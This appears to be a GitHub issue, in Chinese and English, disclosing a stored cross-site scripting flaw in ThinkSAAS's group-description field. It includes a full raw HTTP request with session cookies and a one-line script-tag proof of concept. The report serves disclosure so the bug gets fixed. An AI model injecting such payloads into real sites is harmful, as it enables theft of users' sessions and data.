Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
当添加小组时:https://demo.thinksaas.cn/group/create/ When the group is added:https://demo.thinksaas.cn/group/create/
修改小组介绍时: When the revision of the panel:
POST /index.php?app=group&ac=create&ts=do HTTP/1.1 Host: demo.thinksaas.cn Connection: close Content-Length: 620 Cache-Control: max-age=0 Origin: https://demo.thinksaas.cn Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWEZvXgMRfRnvrT3s Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8 Referer: https://demo.thinksaas.cn/group/create/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8 Cookie: PHPSESSID=1agufb6os5sik9vb5onfcr0vs4; ts_email=admin%40mimaz.org; ts_autologin=c9qrjmbdwf4kw4ok4okoc0ggc84g8gc; Hm_lvt_5964cd4b8810fcc73c98618d475213f6=1533621094,1533625100,1533625361,1533625712; Hm_lpvt_5964cd4b8810fcc73c98618d475213f6=1533625993
------WebKitFormBoundaryWEZvXgMRfRnvrT3s Content-Disposition: form-data; name="groupname"
name1 ------WebKitFormBoundaryWEZvXgMRfRnvrT3s Content-Disposition: form-data; name="groupdesc"
describe1<script src="1.js"> ------WebKitFormBoundaryWEZvXgMRfRnvrT3s Content-Disposition: form-data; name="photo"; filename="" Content-Type: application/octet-stream
------WebKitFormBoundaryWEZvXgMRfRnvrT3s Content-Disposition: form-data; name="tag"
Label1 ------WebKitFormBoundaryWEZvXgMRfRnvrT3s Content-Disposition: form-data; name="token"
ff94d70c0394174b299ac1c1efc5ccd539fc484e ------WebKitFormBoundaryWEZvXgMRfRnvrT3s--
在groupdesc参数端未过滤恶意代码,造成注入。 The malicious code is not filtered at the groupdesc parameter end, causing injection.
POC:<script src="1.js">
官方举例:https://demo.thinksaas.cn/group/show/54/ Official examples:https://demo.thinksaas.cn/group/show/54/
The text was updated successfully, but these errors were encountered:
No branches or pull requests
当添加小组时:https://demo.thinksaas.cn/group/create/
When the group is added:https://demo.thinksaas.cn/group/create/
修改小组介绍时:
When the revision of the panel:
POST /index.php?app=group&ac=create&ts=do HTTP/1.1
Host: demo.thinksaas.cn
Connection: close
Content-Length: 620
Cache-Control: max-age=0
Origin: https://demo.thinksaas.cn
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWEZvXgMRfRnvrT3s
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Referer: https://demo.thinksaas.cn/group/create/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=1agufb6os5sik9vb5onfcr0vs4; ts_email=admin%40mimaz.org; ts_autologin=c9qrjmbdwf4kw4ok4okoc0ggc84g8gc; Hm_lvt_5964cd4b8810fcc73c98618d475213f6=1533621094,1533625100,1533625361,1533625712; Hm_lpvt_5964cd4b8810fcc73c98618d475213f6=1533625993
------WebKitFormBoundaryWEZvXgMRfRnvrT3s
Content-Disposition: form-data; name="groupname"
name1
------WebKitFormBoundaryWEZvXgMRfRnvrT3s
Content-Disposition: form-data; name="groupdesc"
describe1<script src="1.js">
------WebKitFormBoundaryWEZvXgMRfRnvrT3s
Content-Disposition: form-data; name="photo"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryWEZvXgMRfRnvrT3s
Content-Disposition: form-data; name="tag"
Label1
------WebKitFormBoundaryWEZvXgMRfRnvrT3s
Content-Disposition: form-data; name="token"
ff94d70c0394174b299ac1c1efc5ccd539fc484e
------WebKitFormBoundaryWEZvXgMRfRnvrT3s--
在groupdesc参数端未过滤恶意代码,造成注入。
The malicious code is not filtered at the groupdesc parameter end, causing injection.
POC:<script src="1.js">
官方举例:https://demo.thinksaas.cn/group/show/54/
Official examples:https://demo.thinksaas.cn/group/show/54/
The text was updated successfully, but these errors were encountered: